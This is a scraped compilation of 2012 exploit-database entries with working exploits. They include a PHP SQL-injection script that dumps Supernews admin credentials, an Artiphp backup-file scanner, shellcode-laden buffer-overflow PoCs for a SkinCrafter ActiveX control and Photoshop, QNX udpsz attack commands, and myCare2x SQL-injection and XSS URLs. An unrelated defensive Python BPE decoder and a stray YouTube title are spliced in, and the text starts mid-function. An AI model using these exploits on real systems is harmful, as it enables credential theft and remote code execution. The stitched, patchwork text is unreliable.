        $offset = strpos($haystack, $needle, $offset);
        if ($offset !== false) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
        }
    }
    return $haystack;
}

function removeaddregex($str) {
    return str_replace_every_other('(.*)', '', $str, null, false);
}

function preg_quote_working($str) {
    $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
    foreach($chars as $char) {
        $str = str_replace($char, "\\".$char, $str);
    }
    return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by WhiteCollarGroup - www.wcgroup.host56.com\nUse at your own risk.\n\n";

if($argc!=2) {
    echo "Usage: php $argv[0] url
Example:
php $argv[0] http://target.com/supernews
php $argv[0] https://target.com/supernews/";
    exit;
}

if($argv[1]=="moreinfo") {
    echo "\nMore vulnerabilities:
- Deleting files
You can delete files on the server, after login, using the URL:
http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
- Deleting all news on the database:
You can delete all news on the database with one request, only. Look:
http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
All vulnerabilities discovered by WCGroup.\n";
    exit;
}

$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
    $uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";

echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
    $url = $uri."index.php?noticia=".urlencode("-1")."+";
}

$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n[*] Detecting version... :-o";
$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version: >2.6.1 :-)";
    $version = 1;
} else {
    $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
    if(preg_match("/".$token."/", $gettoken)) {
        echo "\n[!] Version =2.6.1 :-)";
        $version = 2;
    } else {
        echo "\n[-] Unknown version :-S";
        $version = 3;
    }
}

if($version!=3) {
    echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
    echo "\n[i] Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
    echo "\n[*] Getting user & pass 8-]";
}

if($version==1) {
    $i = 0;
    while(true) {
        $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if($get[1][0]!="") {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: $user\nPass: $pass\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} elseif($version==2) {
    $i = 0;
    while(true) {
        $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if($get[1][0]!="") {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: $user\nPass: $pass\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} else {
    echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
    echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
    echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
    echo "\nIf you want, try to access manually:";
    echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
    echo "\nWe're sorry.";
}
echo "\n";

Source: Supernews <= 2.6.1 SQL Injection Exploit
-
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

<?php
/*
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

Vendor: Artiphp
Product web page: http://www.artiphp.com
Affected version: 5.5.0 Neo (r422)

Summary: Artiphp is a content management system (CMS) open and free
to create and manage your website.

Desc: Artiphp stores database backups using backupDB() utility with
a predictable file name inside the web root, which can be exploited
to disclose sensitive information by downloading the file. The backup
is located in '/artzone/artpublic/database/' directory as
'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8 / 5.3.9
           MySQL 5.5.20

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php

15.05.2012
*/

error_reporting(0);

print "\no==========================================================o\n";
print "| |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n";
print "| |\n";
print "|\t\t\tby LiquidWorm |\n";
print "| |";
print "\no==========================================================o\n";

if ($argc < 3) {
    print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";
    die();
}

$godina_array = array('2012','2011','2010');
$mesec_array  = array('12','11','10','09',
                      '08','07','06','05',
                      '04','03','02','01');
$dn_array     = array('31','30','29','28','27','26',
                      '25','24','23','22','21','20',
                      '19','18','17','16','15','14',
                      '13','12','11','10','09','08',
                      '07','06','05','04','03','02',
                      '01');
$backup_array = array('full','structure','partial');

$host = $argv[1];
$port = intval($argv[2]);
$path = "/artiphp/artzone/artpublic/database/"; // change per need.

$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";

foreach($godina_array as $godina) {
    print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";
    sleep(2);
    foreach($mesec_array as $mesec) {
        foreach($dn_array as $dn) {
            print "~";
            foreach($backup_array as $backup) {
                if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz")) {
                    print "\n\n\x20[!] DB backup file discovered!\n\n";
                    echo $alert1;
                    print "\x20==>\x20";
                    echo $alert2;
                    die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");
                }
            }
        }
    }
}

print "\n\n\x20[*] Zero findings.\n\n\n"
?>

Source: Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
-
SkinCrafter ActiveX Control version 3.0 Buffer Overflow

# Software : SkinCrafter from NMSoft Technologies
# Version : SkinCrafter version 3.0
# Title : Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
# Link : http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
# Date : May 17, 2012
# Tested on : XP SP2

# The vulnerability lies in the COM component used by the product SkinCrafter
# from DMSoft Technologies (http://www.dmsofttech.com/projects.html). This COM
# component, SkinCrafter3_vs2005.dll, implements a function InitLicenKeys,
# whose parameter is not checked for bounds, hence leading to the
# overflow condition

====
POC:
====

<html>
Exploit !!!!!!!!!!!!!!!!!!!!!!!!!
<object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object>
<script language='vbscript'>
'Exploit title: Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
'Date: May 17, 2012
'author: Saurabh Sharma(HCL Technologies) sharma_saurabh@hcl.com
'Software Link: http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
'version: SkinCrafter version 3.0
'Tested on : XP SP2
'CVE-2012-2271

targetFile = "C:\Program Files\SkinCrafter3\SkinCrafterDemo\SkinCrafterActiveX\SkinCrafter3_vs2005.dll"
prototype = "Sub InitLicenKeys ( ByVal reg_name As String , ByVal company As String , ByVal email As String , ByVal licenkey As String )"
memberName = "InitLicenKeys"
progid = "SKINCRAFTERLib.SCSkin3"
argCount = 4

shellcode= unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

arg1=String(1084, "A")
nSeh=unescape("%eb%06%90%90")
seh=unescape("%bb%44%06%10")
nops=String(40,unescape("%90"))
arg1=arg1+nSeh+seh+nops+shellcode
arg1=arg1+String(10000, "D")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"

target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4

</script>

Source: SkinCrafter ActiveX Control version 3.0 Buffer Overflow
-
QNX phrelay/phindows/phditto Multiple Vulnerabilities

#######################################################################

                             Luigi Auriemma

Application:  QNX phrelay/phindows/phditto
              http://www.qnx.com
              http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
              http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions:     current
Platforms:    QNX Neutrino RTOS and Windows
Bugs:         A] bpe_decompress stack overflow
              B] Photon Session buffer overflow
Exploitation: remote
              A] versus client and maybe server
              B] versus server
Date:         10 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

phrelay and phindows/phditto are based on a private protocol that allows
to use the Photon graphical environment of the server (through the
phrelay inetd program) on another machine (phindows, phditto and any
other client).

#######################################################################

=======
2) Bugs
=======

--------------------------------
A] bpe_decompress stack overflow
--------------------------------

The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack based buffer-overflow caused by
the lack of checks on the data sequentially stored in these two
buffers.

---------------------------------
B] Photon Session buffer overflow
---------------------------------

Buffer-overflow affecting phrelay in the handling of the device file
specified by the client as existing Photon session.

Note: considering that phrelay is not enabled by default and allows to
connect without authentication directly to /dev/photon (the screen
visible physically on the machine) and phindows/phditto must be manually
pointed to the malicious host for exploiting bug A, this advisory must
be considered only a case study and nothing more.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18864.zip

A] at the moment I don't know how to call bpe_decompress on phrelay but
   I have verified that the bpe_decompress function is vulnerable at
   100%. the following test works only on phindows/phditto (the
   proof-of-concept acts as a server):

  udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff

B]
  udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Source: QNX phrelay/phindows/phditto Multiple Vulnerabilities
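Bug A above is a decoder that fills two fixed 256-byte tables from attacker-supplied data without checking how much it writes. The block below is an added example, not QNX's bpe_decompress and not Luigi Auriemma's code: it is a small byte-pair-encoding expander over a stream layout constructed for illustration (a 2-byte pair count, then one (code, left, right) triple per pair, then data), with `bpe_expand` and `is_rejected` as names of this example. It shows the four checks a decoder of this shape needs: the table must fit the fixed arrays, the declared table must be present, pending expansions are bounded so a pair that refers back to itself cannot spin forever, and the decoded size is capped against decompression bombs.

```python
"""Bounds-checked byte-pair-encoding (BPE) expander (added example).

Constructed stream layout, not the QNX wire format:

    u16 big-endian   n_pairs
    n_pairs x        (code, left, right)   one byte each
    remaining bytes  encoded data
"""

TABLE_SIZE = 256       # size of the fixed left[] / right[] arrays
MAX_STACK = 4096       # bound on pending expansions (catches self-referencing pairs)
MAX_OUTPUT = 1 << 20   # bound on decoded size (catches decompression bombs)


class BpeError(ValueError):
    """Raised for malformed or hostile input instead of corrupting memory."""


def bpe_expand(blob: bytes, max_output: int = MAX_OUTPUT) -> bytes:
    if len(blob) < 2:
        raise BpeError("truncated header")
    n_pairs = int.from_bytes(blob[:2], "big")

    # Check 1: the table must fit the fixed-size arrays. An unchecked decoder
    # keeps writing past left[255] / right[255] here.
    if n_pairs > TABLE_SIZE:
        raise BpeError(f"pair table too large: {n_pairs} > {TABLE_SIZE}")

    # Check 2: the declared table must actually be present in the stream.
    table_end = 2 + 3 * n_pairs
    if len(blob) < table_end:
        raise BpeError("truncated pair table")

    # left[c] == c marks c as a literal byte; any other entry is a pair.
    left = bytearray(range(TABLE_SIZE))
    right = bytearray(TABLE_SIZE)
    for i in range(2, table_end, 3):
        code, lhs, rhs = blob[i], blob[i + 1], blob[i + 2]
        left[code] = lhs
        right[code] = rhs

    out = bytearray()
    for byte in blob[table_end:]:
        stack = [byte]
        while stack:
            code = stack.pop()
            if left[code] == code:
                out.append(code)
                # Check 3: cap the decoded size.
                if len(out) > max_output:
                    raise BpeError("decoded output exceeds limit")
            else:
                # Expand left part first: push right, then left.
                stack.append(right[code])
                stack.append(left[code])
                # Check 4: bound pending work; a pair referring back to
                # itself would otherwise grow the stack without end.
                if len(stack) > MAX_STACK:
                    raise BpeError("expansion stack exceeded")
    return bytes(out)


def is_rejected(blob: bytes, max_output: int = MAX_OUTPUT) -> bool:
    """True when the decoder refuses the input instead of processing it."""
    try:
        bpe_expand(blob, max_output)
    except BpeError:
        return True
    return False


# Constructed sample: 0x80 = "ab", 0x81 = 0x80 0x80, data = 0x81 'c' 0x80
SAMPLE = b"\x00\x02" + b"\x80ab" + b"\x81\x80\x80" + b"\x81c\x80"

# Constructed hostile inputs
OVERSIZED_TABLE = b"\x01\x2c" + b"\x00" * (3 * 300)              # n_pairs = 300
SELF_REFERENCING = b"\x00\x02" + b"\x80\x81a" + b"\x81\x80a" + b"\x80"

if __name__ == "__main__":
    print(bpe_expand(SAMPLE))             # b'ababcab'
    print(is_rejected(OVERSIZED_TABLE))   # True
    print(is_rejected(SELF_REFERENCING))  # True
```

The decoder never indexes `left` or `right` with anything but a byte, so the only way to overrun them is the table-load loop, which is exactly where the count is checked before a single entry is written.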
-
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow

<?php
// ~ Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements
// Unicode Conversion Stack Based Buffer Overflow poc (*.dae)
// (32bit/SEH) ~
//
// unicode overflow occurs when overlong asset elements are processed
// one could be able to return inside an ASCII memory region
// with an ultra large nop through assigning eip to ex. Photoshop.00630041.
// the shellcode should be alphabetic (high bytes order filtering and various issues)
//
// Usage: php 9sg_dae.php
// a file photoshop_sample.dae is created
// start Photoshop then open it through the File menu
// a message box pops, HEY!
//
// ~ rgod ~ - Advisory Reference: http://retrogod.altervista.org/9sg_photoshock_adv.htm

/*
you should change addresses according to your system
then reencode with alpha2 (use eax alignment)

//say "Hey" MsgBox Shellcode
$code ="\x31\xc0\x31\xdb\x31\xc9\x31\xd2".
"\xeb\x2a\x59".
"\xbb\xca\x1d\xe4\x77". //LoadLibraryA(), kernel32.dll
"\x51\xff\xd3\xeb\x2f\x59\x51\x50".
"\xbb\x7a\x3d\xe6\x77". //GetProcAddress(), kernel32.dll
"\xff\xd3\xeb".
"\x34\x59\x31\xd2\x52\x51\x51\x52".
"\xff\xd0\x31\xd2\x50".
"\xb8\xf9\x68\xe6\x77". //ExitProcess(), kernel32.dll
"\xff\xd0\xe8\xd1\xff\xff".
"\xff\x75\x73\x65\x72\x33\x32\x2e".
"\x64\x6c\x6c\x00\xe8\xcc\xff\xff".
"\xff\x4d\x65\x73\x73\x61\x67\x65".
"\x42\x6f\x78\x41\x00\xe8\xc7\xff".
"\xff\xff\x48\x65\x79\x00";
*/

$scode = "\x2d\x7d\x25\x5b\x7f". //sub preamble, align eax for alpha code,clean
"\x2d\x79\x22\x20\x6f". //sub, align ... the gap is repaired through the inc eax trick
"PYIIIIIIIIIIIIIIII7QZjA".
"XP0A0AkAAQ2AB2BB0BBABXP".
"8ABuJIvQYPp1IKp1YYtqJrZ".
"K4jpYmk8JuMM4PwpQKOyCZK".
"vORycaRpMksJUmkVqgyoKcz".
"KvTRyTqZrRr0QrqPRkOn0VQ".
"N20PnXzY0hZFpwYojpM8N1k".
"OIokOQebSauPrP3trDnPdrL".
"PlUPKXxLKOKOIorm1u2SRS3".
"QQw0esrbOd8raC0KXKwkOYo".
"KO3xSUt9uPA";

$eip="Ac"; //Photosho.00630041, return to our payload

$payload = str_repeat("\x40",4096000);//inc eax, needed , also nop equivalent, don't touch
$payload.=$scode;
$payload.= str_repeat("\x40",1024000);

$_xml ='<?xml version="1.0"?>'.
'<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">'.
' <asset>'.
' <contributor>'.
' <author>rgod</author>'.
' <authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>'.
' <comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.
' curveConstrainSampling=0;exportCameraAsLookat=0;'.
' exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.
' exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.
' exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.
' exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.
' dereferenceXRefs=0;cameraXFov=0;'.
str_repeat("A",170).
'cameraYFov=1;'.
str_repeat("a",100).
str_repeat("b",100).
str_repeat("c",100).
str_repeat("d",100).
str_repeat("e",100).
str_repeat("f",100).
str_repeat("g",100).
str_repeat("h",100).
str_repeat("i",100).
str_repeat("j",100).
str_repeat("k",100).
str_repeat("l",100).
str_repeat("m",100).
str_repeat("n",100).
"aaaabbbA".
$eip.
"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".
' </comments>'.
'<aaaa>'.
$payload.
'</aaaa>'.
' <copyright>'.
' Copyright 2012 rgod Computer Entertainment Inc.'.
' </copyright>'.
' <source_data>file:///C:/vs2005/sample_data/untitled</source_data>'.
' </contributor>'.
' <created>2008-04-24T22:29:59Z</created>'.
' <modified>2099-02-21T22:52:44Z</modified>'.
' <unit meter="0.01" name="centimeter"/>'.
' <up_axis>Y_UP</up_axis>'.
' </asset>'.
'</COLLADA>';

file_put_contents("photoshop_sample.dae",$_xml);
echo "done";
?>

Source: Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
-
-
Dean - Radmina (Produced by Delyno) - YouTube
-
myCare2x CMS Multiple Vulnerabilities

Title:
======
myCare2x CMS - Multiple Web Vulnerabilities

Date:
=====
2012-05-03

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=524

VL-ID:
=====
524

Introduction:
=============
myCare2x is a web application. All program modules and data accesses are processed in the server.
Users only need a web browser in order to use the myCare2x functions, so extensions or changes on
the modules need no interferences at the clients.

- Apache HTTPD Server
- MySQL Database
- PHP

The spirit of Open Source also takes effect on implemented server software. myCare2x is based upon
Apache as HTTP server and MySQL as database management system. myCare2x is written in PHP - an easy
to learn and powerful scripting language.

(Copy of the Vendor Homepage: http://mycare2x.net/en/solution )

Abstract:
=========
The Vulnerability Laboratory Researcher Team discovered multiple web vulnerabilities in myCare v2x CMS.

Report-Timeline:
================
2012-05-03: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
Multiple remote SQL Injection vulnerabilities are detected in myCare2x Content Management System.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute
own sql commands on the affected application dbms. Successful exploitation of the vulnerability
results in dbms & application compromise. The vulnerability is located on the username post method.

Vulnerable Module(s):
[+] &aktion + &callurl
[+] dept_nr
[+] pid
[+] Eintrag
[+] name_last

Picture(s):
../1.png
../2.png

1.2
Multiple persistent input validation vulnerabilities are detected in myCare2x Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable
(persistent) context manipulation. Exploitation requires low user interaction.

Vulnerable Module(s):
[+] New Person - Insert new Person - Firstname, Lastname & Nickname
[-] Index - Listing (index.php - Search Results - Name (middle) + Person Data Listing (right))

Picture(s):
../3.png
../4.png

1.3
Multiple non persistent cross site scripting vulnerabilities are detected in myCare2x Content Management System.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high
required user interaction or local low privileged user account. Successful exploitation can result in
account steal, phishing & client-side content request manipulation.

Vulnerable Module(s):
[+] mycare_ward_print - Favorite
[+] mycare2x_pat_info - Aktion
[+] mycare2x_proc_search - LN
[+] zusatzcode

Picture(s):
../5.png
../6.png

Proof of Concept:
=================
1.1
The SQL Injection vulnerabilities can be exploited by a remote attacker without user interaction.
For demonstration or reproduce ...

PoC:
http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4leasdpvcl7qi56?=-1%27&aktion=-1%27[SQL-Injection!]&callurl=-1%27[SQL-Injection!]&myPid=403

http://127.0.0.1/modules/importer/mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3?=de&fid=800000101&pid=596&dept_nr=-1%27[SQL-Injection!]

http://127.0.0.1/modules/importer/mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3?=de&fid=800000101&pid=-1%27[SQL-Injection!]&dept_nr=11

http://127.0.0.1/modules/drg/mycare2x_proc_search.php?myAction=Suchen&myOpsEintrag=-1%27[SQL-Injection!&val=&itemx=&mode=&sid=moq09jafqbl4ledgppvcl7qi56?=de&pn=100224&opnr=&ln=Gexxxn&fn=Brxo&bd=&dept_nr=&oprm=&display=&group_nr=&edit=1&icdtype=&y=&m=&d=&zusatzcode=&keyword=[SQL-Injection!]

http://127.0.0.1/modules/patient/mycare_pid.php?pid=&ext_pid=&date_reg=&pat_type=Self&panel=1&title1=&title=&name_last=-1%27[SQL-Injection!&name_first=&name_middle=&name_maiden=&name_others=&extern_access=&date_birth=&sex1=m&sex=m&civil_status1=&civil_status=&scitizenship=...&citizenship=&sreligion=...&religion=&sethnic_orig=..&ethnic_orig=&addr_str=&addr_str_nr=&addr_zip=&addr_town=&addr_citytown=&addr_citytown_nr=&nat_id_nr=DE&country_state=&phone_1_code=&phone_1_nr=&phone_2_code=&phone_2_nr=&cellphone_1_nr=&cellphone_2_nr=&fax=&email=&insurance_name=&insurance_instnr=&insurance_vknr=&insurance_nr=&insurance_state=&insurance_state1=&insurance_card_expire=&sid=moq09jafqbl4ledgppvcl7qi56?=en&myAction=&myFind=Find&myselectnr=&insurance_id=&nr=&edit=1&ref=&is_addon=&preselected_city=&i_active=0&i_max=2&activ_tab_id=0&recognition=&smartcard=&smartcarddata=

http://127.0.0.1/modules/patient/mycare_pid.php?pid=[SQL-Injection!]

1.2
The persistent input validation vulnerabilities can be exploited by a remote attacker with low or medium
required user interaction. For demonstration or reproduce ...

Affected: index.php - Search Results - Name (middle) + Person Data Listing (right)

Review: User/Person Listing

<h2><img src="../../gui/img/common/default/ppd_case.gif">829: "><iframe src="a" onload='alert("VL")' <,="" "=""><iframe src=a onload=alert("VL") <<

URL:
http://127.0.0.1/modules/patient/mycare_pid.php?pid=&ext_pid=&date_reg=2012-04-19+06%3A00%3A00&pat_type=Self&panel=1&title1=&title=&name_last=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&name_first=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&name_middle=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&name_maiden=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&name_others=&extern_access=&date_birth=&sex1=m&sex=m&civil_status1=&civil_status=&scitizenship=...&citizenship=&sreligion=...&religion=&sethnic_orig=..&ethnic_orig=&addr_str=&addr_str_nr=&addr_zip=&addr_town=&addr_citytown=&addr_citytown_nr=&nat_id_nr=DE&country_state=&phone_1_code=&phone_1_nr=&phone_2_code=&phone_2_nr=&cellphone_1_nr=&cellphone_2_nr=&fax=&email=&insurance_name=&insurance_instnr=&insurance_vknr=&insurance_nr=&insurance_state=&insurance_state1=&insurance_card_expire=&sid=moq09jafqbl4ledgppvcl7qi56?=en&myAction=Save&myFind=Find&myselectnr=&insurance_id=&nr=&edit=1&ref=&is_addon=&preselected_city=&i_active=0&i_max=2&activ_tab_id=0&recognition=&smartcard=&smartcarddata=

1.3
The client side cross site scripting vulnerabilities can be exploited by a remote attacker with medium or high
required user interaction. For demonstration or reproduce ...

http://127.0.0.1/modules/nursing/mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&favorites=[Cross Site Scripting!]

http://127.0.0.1/modules/nursing/mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56?=[Cross Site Scripting!]&favorites=[Cross Site Scripting!]

http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&aktion=[Cross Site Scripting!]&callurl=topwin&myPid=403

http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&aktion=|PRI|AVE|FLB|&callurl=[Cross Site Scripting!]&myPid=403

http://127.0.0.1/modules/drg/mycare2x_proc_search.phpmyAction=Suchen&myOpsEintrag=1&val=&itemx=&mode=&sid=moq09jafqbl4ledgppvcl7qi56?=de&pn=100224&opnr=&ln=[Cross Site Scripting!]&fn=Brxo&bd=&dept_nr=&oprm=&display=&group_nr=&edit=1&icdtype=&y=&m=&d=&zusatzcode=&keyword=2

Risk:
=====
1.1
The security risk of the remote sql injection vulnerabilities is estimated as critical.

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (storm () vulnerability-lab com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - irc.vulnerability-lab.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.

Copyright © 2012 Vulnerability-Lab

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research () vulnerability-lab com

Source: myCare2x CMS Multiple Vulnerabilities
-
MYRE Real Estate Mobile 2012|2 Multiple Vulnerabilities

Title:
======
MYRE Real Estate Mobile 2012|2 - Multiple Web Vulnerabilities

Date:
=====
2012-05-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=516

VL-ID:
=====
516

Introduction:
=============
Best solution for a professional Real Estate management software. Try MYRE Real Estate Mobile Software, Real Estate ready-to-use
software best solution for a professional Real Estate management software. Try MYRE Real Estate Software, Real Estate ready-to-use
software. At MYRE Real Estate Software, we offer professional solutions for your Real Estate business needs, including turn-key
operations. That's right, turn-key! Start your real estate business today with MYRE Real Estate Mobile Software and get into the
real estate market the same day.

- Businesses for sale
- Commercial properties for lease
- Commercial properties for sale
- Real estate properties for sale
- Real estate properties for rent
- Holiday rentals
- Or any combination

MYRE Real Estate Software provides a complete realty listing management solution. It is easily customized to reflect your
creativity whether you are starting from scratch or integrating it into an existing web site. MYRE Real Estate Software can be
used to promote residential as well as commercial rentals. This software is suitable for an independent agent site, or the
listings section of your brokerage and/or real estate agency web site.

(Copy of the Vendor Homepage: http://www.myrephp.com & http://myrephp.com/realestate/1_mobile/ )

Abstract:
=========
The Vulnerability Laboratory Researcher Team discovered multiple Vulnerabilities in MYREs Real Estate Mobile Application (2012 Q2).

Report-Timeline:
================
